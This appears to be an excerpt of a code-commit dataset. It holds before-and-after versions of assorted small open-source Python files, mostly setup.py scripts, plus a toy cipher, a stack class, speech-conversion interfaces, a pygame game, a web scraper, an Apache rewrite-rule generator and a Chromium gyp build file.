packages=find_packages(),
scripts=[],
license=open('LICENSE').read(),
description='An unofficial api for Google Play Music.',
long_description=(open('README.rst').read() + '\n\n' +
open('HISTORY.rst').read()),
install_requires=[
'validictory == 0.9.0',
'decorator == 3.3.2',
'mutagen == 1.21',
'protobuf == 2.4.1',
'chardet == 2.1.1',
'requests == 1.1.0',
#for testing album art:
#'hachoir-core == 1.3.3',
#'hachoir-parser == 1.3.4',
#'hachoir-metadata == 1.3.3',
],
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Topic :: Multimedia :: Sound/Audio',
'Topic :: Software Development :: Libraries :: Python Modules'
],
include_package_data=True,
zip_safe=False,
)
| #!/usr/bin/env python
from distutils.core import setup
from setuptools import find_packages
import re
VERSIONFILE = 'gmusicapi/version.py'
version_line = open(VERSIONFILE).read()
version_re = r"^__version__ = ['\"]([^'\"]*)['\"]"
match = re.search(version_re, version_line, re.M)
if match:
version = match.group(1)
else:
raise RuntimeError("Could not find version in '%s'" % VERSIONFILE)
setup(
name='gmusicapi',
version=version,
author='Simon Weber',
author_email='simon@simonmweber.com',
url='http://pypi.python.org/pypi/gmusicapi/',
packages=find_packages(),
scripts=[],
license=open('LICENSE').read(),
description='An unofficial api for Google Play Music.',
long_description=open('README.rst').read(),
install_requires=[
'validictory == 0.9.0',
'decorator == 3.3.2',
'mutagen == 1.21',
'protobuf == 2.4.1',
'chardet == 2.1.1',
'requests == 1.1.0',
#for testing album art:
#'hachoir-core == 1.3.3',
#'hachoir-parser == 1.3.4',
#'hachoir-metadata == 1.3.3',
],
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Topic :: Multimedia :: Sound/Audio',
'Topic :: Software Development :: Libraries :: Python Modules'
],
include_package_data=True,
zip_safe=False,
)
| bsd-3-clause | Python |
91dca4294beccd4b7ff4ff9e1f029c7d63273928 | Create setup.py | heinst/track-class-availability,heinst/track-class-availability | setup.py | setup.py | from setuptools import setup
setup(name='track-class-availability',
version='1.0',
install_requires=['BeautifulSoup >= 4.3.2', 'schedule >= 0.3.1']
)
| mit | Python | |
eb12d44dffadf0c62fe231926a5004e5ef58d1a4 | Add the setup script | tschijnmo/ccpoviz | setup.py | setup.py | from setuptools import setup, find_packages
setup(
name = "ccpoviz",
version = "0.0.1",
packages = find_packages(),
scripts = [],
install_requires = [
'docutils>=0.3',
'pystache>=0.5',
],
package_data = {
'ccpoviz': ['data/*.json', 'data/*.dat'],
},
# metadata for upload to PyPI
author = "Tschijnmo TSCHAU",
author_email = "tschijnmotschau@gmail.com",
description = "Command-line batch molecular visualizer",
license = "MIT",
keywords = "visualization, chemistry",
url = "http://tschijnmo.github.io/ccpoviz",
)
| mit | Python | |
d3e1957915ed9d385742232475ac8992b17c6e7e | bump up version to 1.0.0 | nvie/smart_open,EverythingMe/smart_open,laugustyniak/smart_open,val314159/smart_open,piskvorky/smart_open,mpenkov/smart_open,gojomo/smart_open,RaRe-Technologies/smart_open,RaRe-Technologies/smart_open,tarosky/smart_open,asieira/smart_open,ziky90/smart_open,mpenkov/smart_open | setup.py | setup.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015 Radim Rehurek <me@radimrehurek.com>
#
# This code is distributed under the terms and conditions
# from the MIT License (MIT).
import os
import sys
# minimum required version is 2.6; py3k not supported yet
if not ((2, 6) <= sys.version_info < (3, 0)):
raise ImportError("smart_open requires 2.6 <= python < 3")
# TODO add ez_setup?
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name = 'smart_open',
version = '1.0.0',
description = 'Utils for streaming large files (S3, HDFS, gzip, bz2...)',
long_description = read('README.rst'),
packages=find_packages(),
author = u'Radim Řehůřek',
author_email = 'radimrehurek@seznam.cz',
maintainer = u'Vincent Kríž',
maintainer_email = 'vincent.kriz@kamadu.eu',
url = 'https://github.com/piskvorky/smart_open',
download_url = 'http://pypi.python.org/pypi/smart_open',
keywords = 'file streaming, s3, hdfs',
license = 'MIT',
platforms = 'any',
install_requires=[
'boto >= 2.0',
],
test_suite="smart_open.tests",
classifiers = [ # from http://pypi.python.org/pypi?%3Aaction=list_classifiers
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: Public Domain',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: System :: Distributed Computing',
'Topic :: Database :: Front-Ends',
],
)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015 Radim Rehurek <me@radimrehurek.com>
#
# This code is distributed under the terms and conditions
# from the MIT License (MIT).
import os
import sys
# minimum required version is 2.6; py3k not supported yet
if not ((2, 6) <= sys.version_info < (3, 0)):
raise ImportError("smart_open requires 2.6 <= python < 3")
# TODO add ez_setup?
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name = 'smart_open',
version = '0.1.1',
description = 'Utils for streaming large files (S3, HDFS, gzip, bz2...)',
long_description = read('README.rst'),
packages=find_packages(),
author = u'Radim Řehůřek',
author_email = 'radimrehurek@seznam.cz',
maintainer = u'Vincent Kríž',
maintainer_email = 'vincent.kriz@kamadu.eu',
url = 'https://github.com/piskvorky/smart_open',
download_url = 'http://pypi.python.org/pypi/smart_open',
keywords = 'file streaming, s3, hdfs',
license = 'MIT',
platforms = 'any',
install_requires=[
'boto >= 2.0',
],
test_suite="smart_open.tests",
classifiers = [ # from http://pypi.python.org/pypi?%3Aaction=list_classifiers
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: Public Domain',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: System :: Distributed Computing',
'Topic :: Database :: Front-Ends',
],
)
| mit | Python |
7f63c5b2a624870667d62ff21cbfb28c7cf2a189 | add setup script | yinyin/FileWatcher | setup.py | setup.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from distutils.core import setup
setup(name='FileWatcher',
version='1.00',
description='File watching framework',
packages=['filewatcher', ],
package_dir={'': 'lib'},
requires=['PyYAML (>=3.09)', ],
install_requires=['PyYAML >= 3.09', ],
classifiers=['Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7', ],
license='MIT License',
)
# vim: ts=4 sw=4 ai nowrap
| mit | Python | |
58b92617e03742658a6362f66664109de8993038 | Create setup.py | fnielsen/cvrminer,fnielsen/cvrminer,fnielsen/cvrminer | setup.py | setup.py | from setuptools import setup
setup(
name='cvrminer',
author='Finn Aarup Nielsen',
author_email='faan@dtu.dk',
license='Apache License',
url='https://github.com/fnielsen/cvrminer',
packages=['cvrminer'],
test_requires=['flake8'],
)
| apache-2.0 | Python | |
9abae470ce9cf9d255921d7c4306ee7daadcd6f2 | Add setup.py | legnaleurc/telezombie,legnaleurc/wcpan.telegram | setup.py | setup.py | from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the relevant file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='telezombie',
version='0.1',
description='Telegram Bot API with Tornado',
long_description=long_description,
url='https://github.com/legnaleurc/telezombie',
author='Wei-Cheng Pan',
author_email='legnaleurc@gmail.com',
license='MIT',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Communications :: Chat',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.0',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='telegram tornado',
packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
install_requires=['tornado >= 4', 'pyyaml'],
)
| mit | Python | |
fcf000ee1b6834b5eabc106f6b617157443ed94d | Create sezar.py | GenkaNuank/Crypter | sezar.py | sezar.py | password = [7,29,12,21,5,19,2,11,28,16,10,1,15,24,8,25,4,13,20,18,14,3,17,22,9,23,26,27,6]
def encrypt(a):
cipher = []
i = 0
n = 0
while i < len(a):
while n < len(password):
if int(a[i]) == (n+1):
cipher = cipher + [password[n]]
i += 1
n = 0
break
else:
n += 1
return cipher
def decrypt(a):
solve = []
i = 0
n = 0
while i < len(a):
while n < len(password):
if int(a[i]) == int(password[n]):
solve = solve + [(n+1)]
i += 1
n = 0
break
else:
n += 1
return solve
| mpl-2.0 | Python | |
f1334c006f07b2b1494d4b92a3ecb4186d8e3954 | add stack.py to branch | jesseklein406/data-structures | stack.py | stack.py | from linked_list import LinkedList
#Stack inherits from LinkedList class
class Stack(object):
def __init__(self, iterable=None):
if iterable != None:
self._linkedList = LinkedList(iterable)
else:
self._linkedList = LinkedList()
def push(self, value):
self._linkedList.insert(value)
def pop(self):
return self._linkedList.pop() | mit | Python | |
785a1962c910a722f218bc814d1868f2b4bc7033 | Add interfaces: Parmeterizer, Converter, Analyzer and Synthesizer (and some thier subclasses) | k2kobayashi/sprocket | vctk/interface.py | vctk/interface.py | # coding: utf-8
import numpy as np
"""
Interfaces
"""
class Analyzer(object):
"""
Speech analyzer interface
All of analyzer must implement this interface.
"""
def __init__(self):
pass
def analyze(self, x):
"""
Paramters
---------
x: array, shape (`time samples`)
monoural speech signal in time domain
"""
raise "Not implemented"
class Synthesizer(object):
"""
Speech synthesizer interface
All of synthesizer must implement this interface.
"""
def __init__(self):
pass
def synthesis(self, params):
"""
Paramters
---------
param: tuple
speech parameters (f0, spectrum envelop, aperiodicity)
"""
raise "Not implemented"
class Parameterizer(object):
"""
Parameterizer interface.
All parameterizer must implement this interface.
"""
def __init__(self):
pass
def forward(self, raw):
raise "You must provide a forward parameterization"
def backward(self, param):
raise "You must provide s backward parameterization"
class SpectrumEnvelopeParameterizer(Parameterizer):
"""
Spectrum envelope parameterizer interface
All spectrum envelope parameterizer must implement this interface.
"""
def __init__(self):
pass
class Converter(object):
"""
Abstract Feature Converter
All feature converter must implment this interface.
"""
def __init__(self):
pass
def convert(self, feature):
raise "Not implemented"
class SpectrumEnvelopeConverter(Converter):
"""
Interface of spectrum envelope converter
All of spectrum envelope converter must implement this class
"""
def __init__(self):
pass
def get_shape(self):
"""
this should return feature dimention
"""
raise "Not implemented"
class FrameByFrameSpectrumEnvelopeConverter(SpectrumEnvelopeConverter):
"""
Interface of frame-by-frame spectrum envelope converter
"""
def __init__(self):
pass
def convert_one_frame(self, feature_vector):
raise "converters must provide conversion for each time frame"
def convert(self, feature_matrix):
"""
FrameByFrame converters perform conversion for each time frame
"""
T = len(feature_matrix)
converted = np.zeros((T, self.get_shape()))
for t in range(T):
converted[t] = self.convert_one_frame(feature_matrix[t])
return converted
class TrajectorySpectrumEnvelopeConverter(SpectrumEnvelopeConverter):
"""
TODO
"""
def __init__(self):
pass
| mit | Python | |
ab7d1b230a5ef1c0763da1d150488add0b75ce31 | Add test file | msoedov/flask-graphql-example,msoedov/flask-graphql-example,msoedov/flask-graphql-example,msoedov/flask-graphql-example | tests.py | tests.py | import unittest
class MyappTestCase(unittest.TestCase):
def setUp(self):
myapp.app.config['DEBUG'] = tempfile.mkstemp()
self.app = myapp.app.test_client()
def tearDown(self):
pass
def test_index(self):
rv = self.app.get('/')
assert '<h2>Posts</h2>' in rv.data
if __name__ == '__main__':
unittest.main()
| mit | Python | |
4029f604a4c809a201d0334946d680fb53b467dd | add initial pygame prototype | robotenique/RandomAccessMemory,robotenique/RandomAccessMemory,robotenique/RandomAccessMemory | Python_Data/multimedia/pygameTest.py | Python_Data/multimedia/pygameTest.py | import random as rnd
import pygame
import sys
def generateObj():
objPos = (rnd.randint(50, 950), rnd.randint(50, 950))
objColor = (0, 0, 0)
return list([objColor, objPos])
pygame.init()
bgcolor = (255, 255, 204)
surf = pygame.display.set_mode((1000,1000))
circleColor = (255, 51, 51)
x, y = 500, 500
circleRad = 50
objRad = 25
pygame.display.set_caption("TOOOPPPER!")
obj = generateObj()
change = False
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
elif event.type == pygame.KEYDOWN:
bgcolor = (rnd.randint(50,255), rnd.randint(200,255), rnd.randint(200,255))
circleColor = (rnd.randint(0,255), rnd.randint(0,255), rnd.randint(0,255))
if(change == True):
obj = generateObj()
change = False
if event.key == pygame.K_UP:
y -= 40
elif event.key == pygame.K_DOWN:
y += 40
elif event.key == pygame.K_RIGHT:
x += 40
elif event.key == pygame.K_LEFT:
x -= 40
circlePos = (x % 1000, y % 1000)
surf.fill(bgcolor)
if((circlePos[0] - obj[1][0])**2 + (circlePos[1] - obj[1][1])**2 <= (objRad+circleRad)**2):
obj[1] = (-400, -400)
circleRad += 20
change = True
if(circleRad >= 450):
sys.exit()
pygame.draw.circle(surf, circleColor, circlePos, circleRad)
pygame.draw.circle(surf, obj[0], obj[1], objRad)
pygame.display.flip()
| unlicense | Python | |
b6ee1301075bcd391ce86d54075bf853f4ee6b2d | Add version.py | LabPy/lantz_drivers,MatthieuDartiailh/lantz_drivers,alexforencich/lantz_drivers,elopezga/lantz_drivers | lantz_drivers/version.py | lantz_drivers/version.py | __version__ = '0.0.1'
| bsd-3-clause | Python | |
9387fb8ee3865fdc00b0b96fd8db77ef1b2f13a8 | Create watchingthestuffoverhere.py | ev0x/stuff,ev0x/stuff | python/watchingthestuffoverhere.py | python/watchingthestuffoverhere.py | #!/usr/bin/env python
# coding=utf-8
import string
import re
import csv
from selenium import webdriver
from datetime import datetime
#avaaz url to watch
tehURL = "somethingsomething"
ignores = re.compile('(seconds|minute|minutes|just)\s(ago|now)')
lst = []
while True:
try:
driver = webdriver.PhantomJS()
driver.get(tehURL)
live = driver.find_element_by_id('block-petition-live-feed')
now = datetime.now()
with open("output.csv", "a") as csvfile:
writer = csv.writer(csvfile, delimiter=',')
lines = string.split(live.text, '\n')
for l in lines:
if l != 'RECENT SIGNERS':
if not ignores.search(l):
try:
enc = l
except:
enc = l.encode("utf-8")
if not enc in lst:
lst.append(enc)
enc = '%s, %s' %(now, enc.encode("utf-8"))
try:
print enc.encode("utf-8")
except:
print "Issuing printing output UTF8"
try:
writer.writerow(enc.split(','))
except:
print "Issuing writing to csv"
driver.quit()
except:
print "A weird thing happened..."
| mit | Python | |
fbbb65524a3b8f5486594d89f6cf885663ac7f3d | Support ubuntu variable for DESKTOP_SESSION | hanya/BookmarksMenu,hanya/BookmarksMenu | pythonpath/bookmarks/env/ubuntu.py | pythonpath/bookmarks/env/ubuntu.py |
OPEN = "xdg-open"
FILE_MANAGER = "nautilus"
| apache-2.0 | Python | |
ab52a21b1d4c1260f2f225a4c49f46251bbecd27 | Add script for generating jamendo rewrite rules | foocorp/gnu-fm,foocorp/gnu-fm,foocorp/gnu-fm,foocorp/gnu-fm,foocorp/gnu-fm,foocorp/gnu-fm,foocorp/gnu-fm,foocorp/gnu-fm,foocorp/gnu-fm | scripts/jamendo-rewrite.py | scripts/jamendo-rewrite.py | #!/usr/bin/env python
# Jamendo database dumps can be fetched from: http://img.jamendo.com/data/dbdump_artistalbumtrack.xml.gz
import xml.etree.cElementTree as ElementTree
import sys, gzip, time, os, os.path, urllib, threading
class JamendoRewrite:
    """Emit Apache mod_rewrite rules mapping Jamendo track ids to local files.

    Stream-parses a Jamendo XML database dump and prints one ``RewriteRule``
    per freely-licensed track, rewriting ``<id>.<ext>`` requests to files
    named ``<artist>-<album>-<track>.<ext>`` under *music_path*.
    """

    def __init__(self, path):
        # Path prefix used in the rewrite target for every rule.
        self.music_path = path
        print("RewriteEngine on")

    def parse(self, dump):
        """Parse *dump* (a file-like object over the XML) and print rules."""
        for event, elem in ElementTree.iterparse(dump):
            if elem.tag == "artist":
                artist = self.proc_artist(elem)
                self.make_rules(artist)
                # Dumps are large; drop the processed subtree to bound memory.
                elem.clear()

    def proc_artist(self, elem):
        """Return {"name": str|None, "albums": [...]} for an <artist> element."""
        # Default "name" to None so make_rules can test it even when the
        # dump omits the element (the original raised KeyError here).
        artist = {"name": None, "albums": []}
        for child in elem:
            if child.tag == "name":
                artist["name"] = child.text
            elif child.tag == "Albums":
                artist["albums"] = [self.proc_album(a) for a in child]
        return artist

    def proc_album(self, elem):
        """Return {"name": str|None, "tracks": [...]} for an <album> element."""
        album = {"name": None, "tracks": []}
        for child in elem:
            if child.tag == "name":
                album["name"] = child.text
            elif child.tag == "Tracks":
                album["tracks"] = [self.proc_track(t) for t in child]
        return album

    def proc_track(self, elem):
        """Return {"id": int|None, "name": str|None, "license": str|None}."""
        track = {"id": None, "name": None, "license": None}
        for child in elem:
            if child.tag == "id":
                track["id"] = int(child.text)
            elif child.tag == "name":
                track["name"] = child.text
            elif child.tag == "license":
                track["license"] = child.text
        return track

    def make_rules(self, artist):
        """Print one RewriteRule per fully-described, freely-licensed track."""
        for album in artist["albums"]:
            for track in album["tracks"]:
                if not (track["id"] and track["name"] and album["name"]
                        and artist["name"]
                        and self.free_license(track["license"])):
                    continue
                # '/' would break both the filename and the URL path.
                filename = "%s-%s-%s" % (artist["name"].replace("/", ""),
                                         album["name"].replace("/", ""),
                                         track["name"].replace("/", " "))
                rule = "RewriteRule ^%d\\.(...) %s/%s.$1" % (
                    track["id"], self.music_path, urllib.parse.quote(filename))
                # Apache wants literal spaces backslash-escaped, not %20.
                rule = rule.replace("%20", "\\ ")
                print(rule)

    def free_license(self, license):
        """Return True if *license* is a free (CC BY / BY-SA / Art Libre) URL."""
        if not license:
            # Tracks without a <license> element crashed the original
            # ("in None"); treat them as non-free instead.
            return False
        return ("http://creativecommons.org/licenses/by-sa" in license
                or "http://creativecommons.org/licenses/by/" in license
                or "http://artlibre.org/licence.php/lal.html" in license)
if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: jamendo-rewrite.py <database dump> /path/to/music_files/")
        sys.exit(1)
    # Gzipped dumps are the normal distribution format; plain XML also works.
    # Open in binary mode either way: ElementTree decodes the XML itself, and
    # gzip.open's default is binary.
    opener = gzip.open if sys.argv[1].endswith("gz") else open
    # 'with' guarantees the dump file is closed (the original leaked it).
    with opener(sys.argv[1], "rb") as dump:
        rewriter = JamendoRewrite(sys.argv[2])
        rewriter.parse(dump)
| agpl-3.0 | Python | |
a004747df945f3361b53106339dab43e652fce74 | Fix dependencies for weborigin_unittests | hgl888/blink-crosswalk-efl,nwjs/blink,hgl888/blink-crosswalk-efl,XiaosongWei/blink-crosswalk,nwjs/blink,nwjs/blink,XiaosongWei/blink-crosswalk,jtg-gg/blink,smishenk/blink-crosswalk,smishenk/blink-crosswalk,modulexcite/blink,crosswalk-project/blink-crosswalk-efl,Pluto-tv/blink-crosswalk,kurli/blink-crosswalk,jtg-gg/blink,kurli/blink-crosswalk,jtg-gg/blink,kurli/blink-crosswalk,ondra-novak/blink,jtg-gg/blink,hgl888/blink-crosswalk-efl,kurli/blink-crosswalk,crosswalk-project/blink-crosswalk-efl,nwjs/blink,jtg-gg/blink,modulexcite/blink,crosswalk-project/blink-crosswalk-efl,ondra-novak/blink,hgl888/blink-crosswalk-efl,PeterWangIntel/blink-crosswalk,Bysmyyr/blink-crosswalk,ondra-novak/blink,smishenk/blink-crosswalk,modulexcite/blink,XiaosongWei/blink-crosswalk,smishenk/blink-crosswalk,jtg-gg/blink,modulexcite/blink,ondra-novak/blink,nwjs/blink,PeterWangIntel/blink-crosswalk,jtg-gg/blink,Pluto-tv/blink-crosswalk,smishenk/blink-crosswalk,XiaosongWei/blink-crosswalk,hgl888/blink-crosswalk-efl,kurli/blink-crosswalk,jtg-gg/blink,PeterWangIntel/blink-crosswalk,XiaosongWei/blink-crosswalk,kurli/blink-crosswalk,jtg-gg/blink,modulexcite/blink,kurli/blink-crosswalk,modulexcite/blink,Bysmyyr/blink-crosswalk,PeterWangIntel/blink-crosswalk,Bysmyyr/blink-crosswalk,Bysmyyr/blink-crosswalk,modulexcite/blink,hgl888/blink-crosswalk-efl,Bysmyyr/blink-crosswalk,PeterWangIntel/blink-crosswalk,nwjs/blink,smishenk/blink-crosswalk,kurli/blink-crosswalk,modulexcite/blink,crosswalk-project/blink-crosswalk-efl,kurli/blink-crosswalk,Pluto-tv/blink-crosswalk,jtg-gg/blink,Pluto-tv/blink-crosswalk,ondra-novak/blink,nwjs/blink,ondra-novak/blink,PeterWangIntel/blink-crosswalk,crosswalk-project/blink-crosswalk-efl,hgl888/blink-crosswalk-efl,Bysmyyr/blink-crosswalk,crosswalk-project/blink-crosswalk-efl,nwjs/blink,PeterWangIntel/blink-crosswalk,smishenk/blink-crosswalk,ondra-novak/blink,Pluto-tv/blink-crosswalk,Bysmyyr/bl
ink-crosswalk,ondra-novak/blink,Pluto-tv/blink-crosswalk,smishenk/blink-crosswalk,Pluto-tv/blink-crosswalk,Bysmyyr/blink-crosswalk,hgl888/blink-crosswalk-efl,XiaosongWei/blink-crosswalk,XiaosongWei/blink-crosswalk,nwjs/blink,crosswalk-project/blink-crosswalk-efl,nwjs/blink,hgl888/blink-crosswalk-efl,XiaosongWei/blink-crosswalk,crosswalk-project/blink-crosswalk-efl,XiaosongWei/blink-crosswalk,modulexcite/blink,kurli/blink-crosswalk,ondra-novak/blink,hgl888/blink-crosswalk-efl,PeterWangIntel/blink-crosswalk,Bysmyyr/blink-crosswalk,modulexcite/blink,smishenk/blink-crosswalk,Pluto-tv/blink-crosswalk,Pluto-tv/blink-crosswalk,crosswalk-project/blink-crosswalk-efl,PeterWangIntel/blink-crosswalk,Pluto-tv/blink-crosswalk,PeterWangIntel/blink-crosswalk,XiaosongWei/blink-crosswalk,smishenk/blink-crosswalk,Bysmyyr/blink-crosswalk | Source/weborigin/weborigin_tests.gyp | Source/weborigin/weborigin_tests.gyp | #
# Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
{
'includes': [
'../WebKit/chromium/WinPrecompile.gypi',
'weborigin.gypi',
],
'targets': [{
'target_name': 'weborigin_unittests',
'type': 'executable',
'dependencies': [
'weborigin.gyp:weborigin',
'../wtf/wtf.gyp:wtf',
'../wtf/wtf_tests.gyp:run_all_tests',
'../config.gyp:unittest_config',
'<(DEPTH)/build/temp_gyp/googleurl.gyp:googleurl',
],
'sources': [
'<@(weborigin_test_files)',
],
'conditions': [
['os_posix==1 and OS!="mac" and OS!="android" and OS!="ios" and linux_use_tcmalloc==1', {
'dependencies': [
'<(DEPTH)/base/base.gyp:base',
'<(DEPTH)/base/allocator/allocator.gyp:allocator',
]
}]
]
}],
}
| #
# Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
{
'includes': [
'../WebKit/chromium/WinPrecompile.gypi',
'weborigin.gypi',
],
'targets': [{
'target_name': 'weborigin_unittests',
'type': 'executable',
'dependencies': [
'weborigin.gyp:weborigin',
'../wtf/wtf.gyp:wtf',
'../wtf/wtf_tests.gyp:run_all_tests',
'../config.gyp:unittest_config',
'<(DEPTH)/url/url.gyp:url',
],
'sources': [
'<@(weborigin_test_files)',
],
'conditions': [
['os_posix==1 and OS!="mac" and OS!="android" and OS!="ios" and linux_use_tcmalloc==1', {
'dependencies': [
'<(DEPTH)/base/allocator/allocator.gyp:allocator',
]
}]
]
}],
}
| bsd-3-clause | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.